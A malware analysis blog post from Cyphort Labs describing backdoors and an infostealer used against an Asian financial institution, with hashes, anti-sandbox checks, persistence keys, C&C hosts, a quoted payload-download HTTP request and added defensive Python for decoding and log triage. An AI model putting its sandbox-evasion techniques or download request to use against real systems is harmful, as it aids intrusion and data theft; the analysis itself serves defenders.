
Multiple Malwares used to Target an Asian Financial Institution


Recently, Cyphort Labs received multiple malware samples that were used to target a financial institution in Asia. Due to an ongoing investigation, we will keep the company’s name anonymous. According to the source, the initial entry point of the attack was a spear phishing email sent to one of the employees. The attack involves multiple backdoors and info-stealing trojans. Some of the malware exhibits anti-sandbox properties and includes protection against the heuristic signatures commonly used by anti-virus companies. The samples also share a common theme, such as installing themselves in the %ProgramFiles% or the %UserProfile% folder depending on whether the user has admin privileges. Additionally, the majority of the samples are compiled with Borland Delphi, with their strings encrypted and API strings either obfuscated or split into several strings as protection against heuristic signatures. None of the samples are packed except for one.

Based on the file creation dates of the files, it appears the attack started as early as January 2015 and lasted for three months.

Summary of samples used in this attack

Filename          MD5                               Malware Family  Compiler        Packer  Function
GoogleUpdate.exe  34bad798c01b4b52d708c1409590ea30  Invader         Borland Delphi  None    Backdoor
Flash32.exe       a32d4a717fde77f437f9a01a7b8b8478  Invader         Borland Delphi  None    Backdoor
mslives.exe       52f4092576e46747db71fb2c018d6ec5  -               Borland Delphi  None    Downloader
nethost.exe       3f9e7a1fb8093994ea0f0bbf151ff1e0  Nioupale        C++             None    Backdoor
mpsvc.exe         4e25c2fc8cb2c57ae66ee3cf851e4bc7  Nioupale        Borland Delphi  None    Backdoor
winhost.exe       044e2e7c4813accdbe030c49cef3326b  Hdoor           Borland Delphi  Aspack  Backdoor
dllhost.exe       387942a24884ccadb60b7e7670a0f723  -               C++             None    Downloader
shell64.dll       abf5e379e336f0e6f7314f8bb3f7bcba  PCclient        C++             None    Infostealer
shell64_u.dll     756c11141ab617a2fe38b963a5548378  -               C++             None    Loader

Technical Analysis

GoogleUpdate.exe

The file structure is not what we commonly see in prevalent malware today. Why? Because most AV products today employ heuristic-based detection that flags packed samples and samples with an uncommon file structure. This malware is not packed, and its sections resemble those of a normal file.

Strings are encrypted and only decrypted right before use. The malware also splits its API names into several strings, again to avoid heuristic signatures that detect suspicious strings and APIs.


It drops a copy of itself in the %ProgramFiles% folder if the user is an admin and in the %UserProfile% folder if not:

If admin:

  • %ProgramFilesDir%\Windows NT\Accessories\nt\GoogleUpdate.exe

If not admin:

  • %UserProfile%\Applications\GoogleUpdate.exe

It installs itself as a service with the service name “SENSS”.

After checking that it is successfully running as a service, it checks whether the parent process is explorer.exe or iexplore.exe. If so, it loads its DLL from its data section; the DLL is XOR-encrypted with the key 0x89. Otherwise, it enumerates processes, finds services.exe and injects the DLL into it.

Anti-Sandbox

Detects Sleep Acceleration

To defeat a sandbox, this malware delays execution through sleeps or loops, because it knows a sandbox will only execute the malware for a short, limited time. By contrast, once inside your system, the malware has the luxury of time to perpetrate its malicious intent. To counter this, sandboxes employ sleep acceleration: if they detect that a sample uses a delay, they shorten it. For example, if a sample sleeps for 1 minute, the sandbox changes it to 1 second. Unfortunately, this technique will not work on this malware. It detects sleep acceleration by issuing a sleep, measuring the time elapsed afterwards and checking whether the elapsed time is lower than the requested sleep time.

Detects API hooks

Sandbox systems also hook APIs to observe the behaviour of a file. This malware detects hooks by checking whether the first instruction of a given API is a jmp, call or push/retn, that is, whether the first byte at the API address is one of the following:

  • E8
  • E9
  • EB
  • FF
  • 68????????C3 (push retn)

Payload

The injected code is a backdoor that communicates with the following C&C servers:

  • bbs.gokickes.com:80
  • img.lifesolves.com:8080
  • domain.gokickes.com:443

 

Depending on the backdoor command received, this malware is capable of the following:

  • Download and execute additional files
  • Capture screenshots
  • Capture mouse and keyboard events
  • Update itself
  • Open a remote shell
  • Terminate processes
  • Enumerate network shares
  • Enumerate drives
  • Uninstall itself

Lastly, all data sent to and received from the server is encrypted with the XOR key 0xD5.
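Both keys the sample uses (0x89 for the DLL in its data section, 0xD5 for C&C traffic) are single-byte XOR keys, so an analyst can recover both artefacts without running the sample. The Python below is an added example, not code from the post or from Cyphort: it brute-forces the key of an embedded PE by confirming the DOS stub text behind a candidate ‘MZ’, then decodes a captured C&C buffer; every byte string in it is constructed for the demonstration.

```python
"""Added example (not Cyphort's code): recover single-byte XOR'd artefacts from
the GoogleUpdate.exe sample. The post gives two keys: 0x89 for the DLL stored in
the data section and 0xD5 for C&C traffic. All sample bytes are constructed."""
from typing import Optional, Tuple

DLL_KEY = 0x89   # embedded DLL key, from the post
C2_KEY = 0xD5    # C&C traffic key, from the post
DOS_STUB = b"This program cannot be run in DOS mode"


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


def find_embedded_pe(blob: bytes) -> Optional[Tuple[int, int]]:
    """Return (key, offset) of the first single-byte XOR'd PE image in blob.

    Every key is tried rather than assuming 0x89, so the routine also works on
    a variant that changes its key. A candidate 'MZ' hit is only accepted when
    the DOS stub text decodes within the first 0x80 bytes, which rejects the
    many accidental two-byte matches a 256-key search produces.
    """
    for key in range(256):
        needle = xor_bytes(b"MZ", key)
        start = 0
        while (off := blob.find(needle, start)) != -1:
            if DOS_STUB in xor_bytes(blob[off:off + 0x80], key):
                return key, off
            start = off + 1
    return None


def carve_pe(blob: bytes, key: int, offset: int) -> bytes:
    """Decode from offset to the end of the blob. A real carve would stop at
    SizeOfImage from the PE header; the constructed sample has no such header."""
    return xor_bytes(blob[offset:], key)


def decode_c2(buffer: bytes) -> bytes:
    """Decrypt a captured C&C buffer with the traffic key."""
    return xor_bytes(buffer, C2_KEY)


# Constructed stand-in for a DLL head: 'MZ', padding, then the DOS stub text at
# offset 64, where the search window will see it.
FAKE_DLL = b"MZ" + b"\x00" * 62 + DOS_STUB + b".\r\n$"
# Constructed data section: unrelated bytes, the XOR'd DLL, trailing padding.
DATA_SECTION = b"\x00" * 16 + b"config=1;" + xor_bytes(FAKE_DLL, DLL_KEY) + b"\xff" * 8
# Constructed C&C message as it would appear on the wire.
CAPTURED_C2 = xor_bytes(b"CMD|screenshot|1024x768", C2_KEY)

if __name__ == "__main__":
    hit = find_embedded_pe(DATA_SECTION)
    print("embedded PE:", hit and f"key=0x{hit[0]:02x} offset={hit[1]}")
    print("C&C plaintext:", decode_c2(CAPTURED_C2))
```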


mslives.exe

This sample has a similar file structure to GoogleUpdate.exe, but it does not employ the same anti-sandbox tricks.

When first run, it sleeps for 300 seconds before starting its installation routine. Afterwards, it creates a copy of itself as follows:

  • %ProgramFiles%\Windows NT\Accessories\Microsoft\mslives.exe

The copy, however, is written with a large amount of garbage data appended at the end of the file, which balloons its size to more than 100MB: it writes 100KB of data to the file 1000 times. This behaviour tries to evade sandboxes in two ways. First, the malware technically does not create an exact copy of itself, which is unusual (the usual malware behaviour is to create an exact copy) and may appear benign to a sandbox. Second, the many write events might exceed the sandbox’s limits, and the size of the dropped copy makes it unsuspicious to the sandbox.

It executes the dropped copy using CreateProcess, then checks whether it is running as iexplore.exe; if not, it creates a suspended iexplore.exe process and injects its code into it by overwriting iexplore.exe’s main module.

It creates a hidden window with the window name and class name “111111”.

It then creates the autostart registry entry below so that it runs at every startup.

  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    • Value: msliveupdate
    • Data: %ProgramFilesDir%\Windows NT\Accessories\Microsoft\mslives.exe

 

Payload

This sample has only one purpose: to download and execute a file from forum.energymice.com.

GET /view/login.asp HTTP/1.1
Content-Type: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; 5.1)
Host: forum.energymice.com
Cache-Control: no-cache

It downloads the file into the %TEMP% folder and executes it. Unfortunately, at the time of our analysis the download URL was not returning any binary.

 


winhost.exe

Unlike the other files, this one is clearly packed. PEiD identifies the packer as follows:

  • ASProtect 1.2x – 1.3x [Registered] -> Alexey Solodovnikov

This file is a backdoor named “HDOOR”, as we found this string in its body. We also found other interesting strings that indicate the protector used.

  • HDoor, Version 1.0
  • Copyright (C) 2013
  • (c) 2010 DYAMAR EnGineerinG, All rights reserved, http://www.dyamar.com.

 

This is a backdoor that listens on port 143 and waits for the client to connect and issue commands. Port 143 is the default unencrypted IMAP port. IMAP (Internet Message Access Protocol) is a mail protocol used for accessing email on a remote server from a local client.

It checks whether the user is an admin. If so, it installs itself as a service and drops a copy in the following directory:

  • %ProgramFiles%\Common Files\System\NT\lib\winhost.exe

If the user is not an admin, it installs itself as follows and creates an autostart entry in the registry.

  • %USERPROFILE%\System\winhost.exe

Autostart Registry Entry:

  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    • Value: Microsoft Messenger
    • Data: %USERPROFILE%\System\winhost.exe

 

Payload


It is capable of performing the following, depending on the attacker’s command.

  • Disconnect
  • Get backdoor install path
  • List directory or files
  • Type (display) a text file’s content
  • Execute A Program
  • Download A File
  • Get A CMD Shell
  • Exit CMD Shell
  • Upload a file
  • Download a file
  • Load dll library
  • Free dll library

 

nethost.exe

It installs a copy of itself as follows, depending on whether the user is an admin or not:

If user is admin:

  • %ProgramFiles%\common files\system\library\nethost.exe

Installs itself as a service:

  • HKLM\System\CurrentControlSet\Services\ncoglsse
    • DisplayName = Microsoft Wireless Device Service
    • ImagePath = %ProgramFiles%\common files\system\library\nethost.exe

If not admin:

  • %USERPROFILE%\system\library\nethost.exe

It creates the following autostart key:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    • Value: “ncoglsse”
    • Data: %ProgramFiles%\common files\system\library\nethost.exe


After installation, it injects into lsass.exe to stay memory-resident and executes its payload.

Payload

It downloads from the following URLs:

  • http://hud321.astringer.com/images/log.gif
  • http://grop.waterglue.org/images/logg.gif
  • http://hud.astringer.com/images/log.gif

The downloaded files contain encrypted URLs that it uses to connect to its C&C. The malware connects to this URL using HTTP POST and sends the following information:

  • IP address
  • Language ID
  • Malware version
  • OS version
  • Machine name

 

It receives commands from the C&C and is capable of the following:

  • Collect information about the drives and folders on the PC
  • List files
  • Download files
  • Terminate processes
  • Open a CMD shell

 

Shell64.dll  

Shell64_u.dll – Loader Component

The loader component runs as a service, loads the espionage component and makes sure the infection stays intact. The service, including its name, is configured by the malware dropper, which was not known at the time of writing. Strings embedded in the loader component suggest the binary is packed with the Dyamar binary protector, but the binary does not give the impression of being thoroughly protected.

Simple obfuscation elements introduced by macros, and a number of obfuscated strings, show attempts at complicating analysis but are easily bypassed. The binary also comes with three dummy exports, which show more of the obfuscation elements. Interestingly, the binary keeps a log file at C:\debug.txt to which debug messages are written. This is rather uncommon for binaries found in the wild.

The ServiceMain method directs execution to one of the exports: ‘LoadFunc’ for Windows versions below 6.0, or ‘win7load’ for 6.0 and above. These exports load the espionage component, running it via a spawned rundll32.exe process with the corresponding parameters set. This second-stage binary exports two functions, ‘main’ and ‘lowmain’, again one for OS versions below 6.0 and one for 6.0 and above.


Shell64.dll – Espionage Component

The espionage component has the internal name ‘Server.dll’. It exports the functions ‘main’ and ‘lowmain’, where main serves OS versions 6.0 and above and lowmain serves versions below 6.0. Just like the loader component, this binary creates and maintains the file C:\debug.txt, to which debugging information is written.

During startup shell64.dll creates a named mutex, dubbed ‘Global\\KongQi [TickCount]’, where TickCount is the time stamp at the time of infection. The malware also creates a named view, dubbed ‘_kaspersky’, which is used to exchange runtime information among threads and intruded processes. The name is doubtlessly chosen to add stealth.


During startup the malware gathers information about the infected system and sends it to its remote server. The information includes:

  • Hostname
  • System CPU power
  • OS version
  • Drive geometry for PHYSICALDRIVE0
  • Global memory status
  • Video capture driver description
  • Installed security products based on running processes list

 

Security Product Enumeration

The list of products searched for is long:

Process Name                        Anti-Virus
fsav32.exe, MsMpEng.exe             F-Secure
FPAVServer.exe                      F-PROT
BullGuardScanner.exe                BullGuard
vrmonsvc.exe                        ViRobot
AYRTSrv.aye                         ALYac
V3lsvc.exe                          V3Lite
Kxetray.exe                         King
KSafeSvc.exe                        King Defender
TMBMSRV.exe                         Trend
knsdtray.exe, FilMsg.exe, V3SP.exe  Keniu
RavMonD.exe                         Rising
KvMonXP.exe                         JiangMin
Mcshield.exe                        McAfee
avgnsx.exe                          NOD32
AvastSvc.exe                        Avast!
dwengine.exe                        Dr.Web
secenter.exe                        BitDefender
avguard.exe                         Avira
ccSvcHst.exe                        Norton
avp.exe                             Kaspersky
360sd.exe                           360 Antivirus
360tray.exe                         360 Defender

 

The following firewall installations will also be enumerated:

  • Norton Personal Firewall
  • ZoneAlarm
  • Comodo Firewall
  • eTrust EZ Firewall
  • F-Secure Internet Security
  • McAfee Personal Firewall
  • Outpost Personal Firewall
  • Panda Internet Security Suite
  • Panda Anti-Virus/Firewall
  • BitDefender/Bull Guard Antivirus
  • Rising Firewall
  • 360Safe AntiArp

 

Espionage Capabilities

Once the malware is set up and running, it waits for instructions from the remote servers. Its capabilities are plentiful, and all are designed to steal data from the infected system. Spied information is compressed with the deflate algorithm and sent to a remote server. The list of analysed functions is as follows:

  • Video capture using a capture window named CVideoCap, compressing the video with the Windows VCM API (Video Compression Manager)
  • Sound capture from the system’s sound input device, i.e. the microphone
  • Stealing data from the current desktop’s clipboard, which can yield passwords from password managers
  • Capture screenshots, compress them and exfiltrate them as a stream
  • A userland keylogger that sets a global Windows hook via SetWindowsHookEx to listen for keyboard events, which are parsed through the Windows IMM API (Input Method Manager); keystrokes are dumped to a file named ‘jpjl.dat’ created within the Windows system directory
  • Clear the event logs for ‘Application’, ‘Security’ and ‘System’, which is usually done to erase forensic evidence of an intrusion
  • Shut the system down, which eventually forces a reboot
  • Create a local user account with the description ‘This user account is used by the Visual Studio .NET Debugger’
  • Download files and execute them
  • Execute other binaries from disk
  • Enumerate files and file attributes on the system; modify and delete files and directories
  • Enumerate the window names of open applications
  • Enumerate system attributes such as OS version, CPU power and memory capacity of the disk, system up time, number of processors, names of running processes (matched against security products), computer name, user name of the current user and attached drives
  • Enumerate parameters of dial-up connections, such as phone number and device name
  • Enable terminal services and allow remote connections
  • Pop up message boxes
  • Open a socket for sending and receiving data
  • Delete its files and persistence mechanisms from the machine, i.e. uninstall the service and remove an auto-run registry key located under [HKLM]\..\CurrentVersion\Run named ‘MSLiveMessenger’; it is unclear, though, how this key is created in the first place

 

Persistence Methods

The binaries are designed to run in the context of a Windows service, which is assumed to be set up by the corresponding dropper. The service name remains unclear, as it is also set by the dropper. However, the malware comes with the capability to inject its payload into remote processes and contains a function to inject into winlogon.exe (on Windows versions prior to 6.0).
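The persistence artefacts reported across the samples (the SENSS and ncoglsse services; the msliveupdate, Microsoft Messenger, ncoglsse and MSLiveMessenger Run values; and the install paths under %ProgramFiles% or %UserProfile%) can be checked on a suspect host with a short triage script. The Python below is an added example, not code from the post or from Cyphort: it matches constructed autostart records against those indicators both by name and by path tail, so the check holds whichever root the malware chose; the record format is an assumption for the demonstration.

```python
"""Added example (not Cyphort's code): triage autostart entries against the
persistence artefacts this post reports: service names, Run-key value names and
the admin / non-admin install paths. The entry records are constructed; a real
run would feed in a registry or Autoruns export."""
# Run-key value names and service names from the post, mapped to the sample.
RUN_VALUES = {"msliveupdate": "mslives.exe", "microsoft messenger": "winhost.exe",
              "ncoglsse": "nethost.exe", "mslivemessenger": "shell64.dll"}
SERVICE_NAMES = {"senss": "GoogleUpdate.exe", "ncoglsse": "nethost.exe"}
# Install paths relative to the %ProgramFiles% (admin) / %UserProfile% (non-admin) root.
PATH_TAILS = {
    r"windows nt\accessories\nt\googleupdate.exe": "GoogleUpdate.exe",
    r"applications\googleupdate.exe": "GoogleUpdate.exe",
    r"windows nt\accessories\microsoft\mslives.exe": "mslives.exe",
    r"common files\system\nt\lib\winhost.exe": "winhost.exe",
    r"system\winhost.exe": "winhost.exe",
    r"common files\system\library\nethost.exe": "nethost.exe",
    r"system\library\nethost.exe": "nethost.exe",
}


def normalize_image(image: str) -> str:
    """Lower-case the image path and drop quotes, forward slashes and any
    arguments after the executable name."""
    path = image.strip().strip('"').replace("/", "\\").lower()
    end = path.find(".exe")
    return path[:end + 4] if end != -1 else path


def match_path(image: str):
    """Return the sample whose install location the image path ends with."""
    path = normalize_image(image)
    for tail, sample in PATH_TAILS.items():
        if path.endswith("\\" + tail):
            return sample
    return None


def triage(entries):
    """Return [(entry name, [reasons])]. An entry trips on its name, its image
    path or both, so a renamed Run value is still caught by the path."""
    findings = []
    for e in entries:
        table = SERVICE_NAMES if e["type"] == "service" else RUN_VALUES
        by_name = table.get(e["name"].lower())
        by_path = match_path(e["image"])
        reasons = ([f"{e['type']} name matches {by_name}"] if by_name else []) + (
            [f"image path matches {by_path} install location"] if by_path else [])
        if reasons:
            findings.append((e["name"], reasons))
    return findings


CONSTRUCTED_AUTORUNS = [
    {"type": "service", "name": "SENSS",
     "image": r"C:\Program Files\Windows NT\Accessories\nt\GoogleUpdate.exe"},
    {"type": "run", "name": "msliveupdate",
     "image": r"C:\Program Files\Windows NT\Accessories\Microsoft\mslives.exe"},
    {"type": "run", "name": "OneDrive",
     "image": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"type": "run", "name": "Updater",          # renamed value, same binary
     "image": r'"C:\Users\bob\System\winhost.exe" -s'},
    {"type": "service", "name": "ncoglsse",
     "image": r"C:\Program Files\common files\system\library\nethost.exe"},
]
```

Run `triage(CONSTRUCTED_AUTORUNS)` to see the four flagged entries; the OneDrive record is the clean control.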

 

dllhost.exe

This malware does not do much. It only tries to download from blog.softfix.co.kr:80.
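Taken together, the C&C hosts listed for GoogleUpdate.exe, mslives.exe, nethost.exe and dllhost.exe, plus the registered domains in the Whois section that follows, form a small network watch list. The Python below is an added example, not code from the post or from Cyphort: it matches constructed proxy-log lines against that list, giving the exact mslives.exe request (host, URI and User-Agent) a stronger verdict than a bare host match; the log format and the log lines are assumptions for the demonstration.

```python
"""Added example (not Cyphort's code): flag proxy-log lines that reach the C&C
infrastructure named in this post. Log lines use a constructed one-line form,
'timestamp src_ip METHOD host:port/uri "User-Agent"', and are constructed too.
The matching tiers are ours; every indicator comes from the post."""
import re

# Exact C&C hosts from the post, mapped to the sample that contacts them.
C2_HOSTS = {
    "bbs.gokickes.com": "GoogleUpdate.exe", "img.lifesolves.com": "GoogleUpdate.exe",
    "domain.gokickes.com": "GoogleUpdate.exe", "forum.energymice.com": "mslives.exe",
    "hud321.astringer.com": "nethost.exe", "grop.waterglue.org": "nethost.exe",
    "hud.astringer.com": "nethost.exe", "blog.softfix.co.kr": "dllhost.exe",
}
# Registered domains from the Whois section; any host under them is suspect.
ATTACKER_DOMAINS = {
    "gokickes.com": "GoogleUpdate.exe", "lifesolves.com": "GoogleUpdate.exe",
    "energymice.com": "mslives.exe", "astringer.com": "nethost.exe",
    "waterglue.org": "nethost.exe", "softfix.co.kr": "dllhost.exe",
    "diskoco.com": "mpsvc.exe",
}
# The mslives.exe download request quoted in the post.
MSLIVES_URI = "/view/login.asp"
MSLIVES_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Win32; 5.1)"
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) '
                    r'(?P<host>[^:\s]+):(?P<port>\d+)(?P<uri>\S*) "(?P<ua>[^"]*)"$')


def classify(rec):
    """Return (sample, reason) for a parsed record, or None if it looks clean."""
    host = rec["host"].lower()
    if host in C2_HOSTS:
        sample = C2_HOSTS[host]
        if sample == "mslives.exe" and rec["uri"] == MSLIVES_URI and rec["ua"] == MSLIVES_UA:
            return sample, "exact mslives.exe download request (host, URI and User-Agent)"
        return sample, f"known C&C host {host}:{rec['port']}"
    for domain, sample in ATTACKER_DOMAINS.items():
        if host == domain or host.endswith("." + domain):
            return sample, f"host under attacker-registered domain {domain}"
    return None


def scan(lines):
    """Parse each log line; return (line_no, src_ip, sample, reason) tuples."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if m is None:
            continue        # malformed line: skip it, never crash the triage run
        verdict = classify(m.groupdict())
        if verdict:
            hits.append((no, m.group("src")) + verdict)
    return hits


CONSTRUCTED_LOG = [
    '2015-02-03T09:12:44Z 10.1.5.23 GET forum.energymice.com:80/view/login.asp '
    '"Mozilla/4.0 (compatible; MSIE 8.0; Win32; 5.1)"',
    '2015-02-03T09:13:01Z 10.1.5.23 GET www.example.com:80/index.html "Mozilla/5.0"',
    '2015-02-03T09:15:10Z 10.1.5.40 POST img.lifesolves.com:8080/ "Mozilla/4.0"',
    '2015-02-03T09:20:00Z 10.1.5.41 GET cdn.gokickes.com:443/ "Mozilla/4.0"',
    'not a log line',
]
```

Calling `scan(CONSTRUCTED_LOG)` flags lines 1, 3 and 4; the example.com line and the malformed line pass through untouched.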


Who’s behind?

The attacker used C&C servers registered in Korea with registration records that look fake. Some of the C&C domains are also owned by hugedomains.com, a company that sells previously owned domains and offers a service that hides registrant information. We also noticed, based on the strings in the binaries, that the malware clearly does not come from a native English speaker.

 

 

Whois Records of C&C used

bbs.gokickes.com:80, domain.gokickes.com:443 (GoogleUpdate.exe)
  Emails: dodomonk@mail.com (a, t, r)
  Names: smith jack (a, t, r)
  Organizations:
  Streets: seoul, korea (a, t, r)
  Cities: seoul (a, t, r)
  States: seoul (a, t, r)
  Postals: 158070 (a, t, r)
  Countries: KR (a, t, r)
  Phones: 8245896312 (a, t, r)

img.lifesolves.com:8080 (GoogleUpdate.exe)
  Emails: jimkimteen@mail.com (a, t, r)
  Names: zhang yunqiang (a, t, r)
  Organizations:
  Streets: Taiping Road (a, t, r)
  Cities: seoul (a, t, r)
  States: seoul (a, t, r)
  Postals: 100-744 (a, t, r)
  Countries: KR (a, t, r)
  Phones: 82527656289 (a, t, r)

softfix.co.kr (dllhost.exe)
  Registrant: gson
  Administrative Contact (AC): zhang yunqiang
  AC E-Mail: jimkimteen@mail.com
  Registered Date: 2014. 01. 08.
  Last Updated Date: 2014. 01. 08.
  Expiration Date: 2016. 01. 08.
  Publishes: N
  Authorized Agency: Gabia, Inc. (http://www.gabia.co.kr)
  DNSSEC: unsigned

diskoco.com (mpsvc.exe)
  Registrant Name: yang qi
  Registrant Organization: yang qi
  Registrant Street: Guancheng District No126
  Registrant City: dong guan
  Registrant State/Province: Guangdong
  Registrant Postal Code: 523000
  Registrant Country: China
  Registrant Phone: +86.0769 89098138
  Registrant Fax: +86.0769 89098200
  Registrant Email: softmoon@mail.com

forum.energymice.com (mslives.exe)
  Registrant Name: Domain Admin
  Registrant Organization: HugeDomains.com
  Registrant Street: 2635 Walnut Street
  Registrant City: Denver
  Registrant State/Province: CO
  Registrant Postal Code: 80205
  Registrant Country: US
  Registrant Phone: +1.303.893.0552
  Registrant Email: domains@hugedomains.com

astringer.com (nethost.exe)
  Registrant Name: Domain Admin / This Domain is For Sale
  Registrant Organization: HugeDomains.com
  Registrant Street: 2635 Walnut Street
  Registrant City: Denver
  Registrant State/Province: CO
  Registrant Postal Code: 80205
  Registrant Country: US
  Registrant Phone: +1.303.893.0552
  Registrant Email: domains@hugedomains.com

waterglue.org (nethost.exe)
  Registrant Name: Registration Private
  Registrant Organization: Domains By Proxy, LLC
  Registrant Street: DomainsByProxy.com
  Registrant Street: 14747 N Northsight Blvd Suite 111, PMB 309
  Registrant City: Scottsdale
  Registrant State/Province: Arizona
  Registrant Postal Code: 85260
  Registrant Country: US
  Registrant Phone: +1.4806242599
  Registrant Fax: +1.4806242598
  Registrant Email: WATERGLUE.ORG@domainsbyproxy.com

 

 

Malware doesn’t need to be advanced to be effective

These malware families are not advanced, and we have seen them before, yet they were able to infiltrate and bypass security. The malware was able to reside unnoticed for three months, which gave the attacker plenty of time to operate. This proves that malware does not need to be advanced or sophisticated to get through.

AV is still our best defence; it blocks the majority of security events. It is just that there are so many malware attacks using so many different techniques that no single security solution will stop all of them. That is why we need multiple security solutions, and we need security people in our respective organizations.

 

Why spear phish?

The initial entry point of the malware was a spear phishing email targeting one of the heads of the company. According to a report from TrendMicro, spear-phishing is still the most favoured APT attack bait. They said that “APT campaigns frequently make use of spear-phishing tactics because these are essential to get high-ranking targets to open phishing emails.”

It is easy for an attacker to guess the email addresses of people in an organization, especially high-ranking officials, as their names are available online. The attackers can easily profile them by searching for any information available online, which lets them customize the attack to the profile of the target.

As has been proven, attackers usually target the weakest point, and more often than not the weakest point is the people in our organization. The message is that to protect our organization, we must also educate and train everyone within it in proper security practices, so that they do not fall for these types of social engineering attacks.

Special thanks to Marion Marschalek and the rest of the Cyphort Labs team for their help in analysis of this attack. 

 

 

The post Multiple Malwares used to Target an Asian Financial Institution appeared first on Cyphort.

